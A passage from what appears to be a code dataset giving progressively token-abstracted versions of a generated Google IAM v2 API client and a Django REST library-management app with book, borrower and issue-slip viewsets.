PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n<class token>\n"
] | false |
99,825 | 089ac07b11afaa81f4675f2dfca9fa9a3125c555 | from datetime import datetime, timedelta
from django.shortcuts import render
from rest_framework import viewsets, status
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.authtoken.models import Token
from rest_framework.response import Response
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAdminUser
from .models import Book, Borrower, IssueSlip
from .permissions import (
ReadBookPermission,
ReadUpdateStudentPermission,
ReadUpdateTeacherPermission
)
from .serializers import (
BookSerializer,
BookDetailSerializer,
BorrowerSerializer,
BorrowerDetailSerializer,
IssueSlipSerializer
)
# def ObjectInactive(self, request, pk):
# object = self.get_object()
# object.is_active = False
# object.save()
# return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class HomePage:
def index(request):
return render(request, 'index.html')
class CustomAuthToken(ObtainAuthToken):
def post(self, request, *args, **kwargs):
serializer = self.serializer_class(data=request.data,
context={'request': request})
serializer.is_valid(raise_exception=True)
user = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=user)
return Response({
'token': token.key,
'user_id': user.pk,
'email': user.email
})
class BookViewSet(viewsets.ModelViewSet):
authentication_classes = (TokenAuthentication,)
permission_classes = (ReadBookPermission,)
queryset = Book.objects.all()
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BookSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BookDetailSerializer
return BookDetailSerializer
def destroy(self, request, pk):
book = self.get_object()
book.is_active = False
book.is_available = False
book.save()
return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class StudentViewSet(viewsets.ModelViewSet):
queryset = Borrower.objects.filter(borrower_type__iexact='S')
authentication_classes = (TokenAuthentication,)
permission_classes = (ReadUpdateStudentPermission,)
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BorrowerSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BorrowerDetailSerializer
return BorrowerDetailSerializer
def destroy(self, request, pk):
student = self.get_object()
student.is_active = False
student.save()
return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class TeacherViewSet(viewsets.ModelViewSet):
queryset = Borrower.objects.filter(borrower_type__iexact='T')
authentication_classes = (TokenAuthentication,)
permission_classes = (ReadUpdateTeacherPermission,)
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BorrowerSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BorrowerDetailSerializer
return BorrowerDetailSerializer
def destroy(self, request, pk):
teacher = self.get_object()
teacher.is_active = False
teacher.save()
return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class BorrowerViewSet(viewsets.ModelViewSet):
queryset = Borrower.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAdminUser,)
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BorrowerSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BorrowerDetailSerializer
return BorrowerDetailSerializer
class IssueSlipViewSet(viewsets.ModelViewSet):
queryset = IssueSlip.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAdminUser),
serializer_class = IssueSlipSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return Response({'msg': 'The Book has been issued'}, status=status.HTTP_201_CREATED)
def partial_update(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
issue_object = IssueSlip.objects.get(id=kwargs['pk'])
book_object = Book.objects.get(id=issue_object.book_id)
borrower_object = Borrower.objects.get(id=issue_object.borrower_id)
book_object.is_available = True
borrower_object.issue_count -= 1
book_object.save()
borrower_object.save()
actual_return_date = datetime.now().replace(second=0, microsecond=0)
if issue_object.due_date >= actual_return_date:
request.data['actual_return_date'] = actual_return_date
self.update(request, *args, **kwargs)
return Response({'msg': 'You have no fine to pay'}, status=status.HTTP_200_OK)
else:
elapsed_time = actual_return_date - issue_object.due_date
fine_amount = elapsed_time.seconds//60
request.data['actual_return_date'] = actual_return_date
request.data['fine_amount'] = fine_amount
self.update(request, *args, **kwargs)
return Response({'msg': 'You have a fine to pay', 'fine': fine_amount}, status=status.HTTP_200_OK)
# def list(self, request):
# pass
# def create(self, request):
# pass
# def retrieve(self, request, pk=None):
# pass
# def update(self, request, pk=None):
# pass
# def partial_update(self, request, pk=None):
# pass
# def destroy(self, request, pk=None):
# pass | [
"from datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom rest_framework import viewsets, status\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAdminUser\nfrom .models import Book, Borrower, IssueSlip\nfrom .permissions import (\n ReadBookPermission,\n ReadUpdateStudentPermission,\n ReadUpdateTeacherPermission\n)\nfrom .serializers import (\n BookSerializer,\n BookDetailSerializer,\n BorrowerSerializer,\n BorrowerDetailSerializer,\n IssueSlipSerializer\n)\n\n# def ObjectInactive(self, request, pk):\n# object = self.get_object()\n# object.is_active = False\n# object.save()\n# return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass HomePage:\n\n def index(request):\n return render(request, 'index.html')\n\nclass CustomAuthToken(ObtainAuthToken):\n\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data,\n context={'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({\n 'token': token.key,\n 'user_id': user.pk,\n 'email': user.email\n })\n\nclass BookViewSet(viewsets.ModelViewSet):\n\n authentication_classes = (TokenAuthentication,)\n permission_classes = (ReadBookPermission,)\n queryset = Book.objects.all()\n \n def get_serializer_class(self):\n\n if hasattr(self, 'action') and self.action == 'list': \n return BookSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n \n return BookDetailSerializer\n \n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass StudentViewSet(viewsets.ModelViewSet):\n\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = (TokenAuthentication,)\n permission_classes = (ReadUpdateStudentPermission,)\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list': \n return BorrowerSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = (TokenAuthentication,)\n permission_classes = (ReadUpdateTeacherPermission,)\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list': \n return BorrowerSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n\n queryset = Borrower.objects.all()\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAdminUser,)\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n\n return BorrowerDetailSerializer\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n\n queryset = IssueSlip.objects.all()\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAdminUser),\n serializer_class = IssueSlipSerializer\n\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.HTTP_201_CREATED)\n \n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date: \n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs) \n return Response({'msg': 'You have no fine to pay'}, status=status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds//60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount \n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine': fine_amount}, status=status.HTTP_200_OK)\n\n# def list(self, request):\n# pass\n\n# def create(self, request):\n# pass\n\n# def retrieve(self, request, pk=None):\n# pass\n\n# def update(self, request, pk=None):\n# pass\n\n# def partial_update(self, request, pk=None):\n# pass\n\n# def destroy(self, request, pk=None):\n# pass",
"from datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom rest_framework import viewsets, status\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAdminUser\nfrom .models import Book, Borrower, IssueSlip\nfrom .permissions import ReadBookPermission, ReadUpdateStudentPermission, ReadUpdateTeacherPermission\nfrom .serializers import BookSerializer, BookDetailSerializer, BorrowerSerializer, BorrowerDetailSerializer, IssueSlipSerializer\n\n\nclass HomePage:\n\n def index(request):\n return render(request, 'index.html')\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n\n\nclass HomePage:\n\n def index(request):\n return render(request, 'index.html')\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n\n\nclass HomePage:\n <function token>\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset 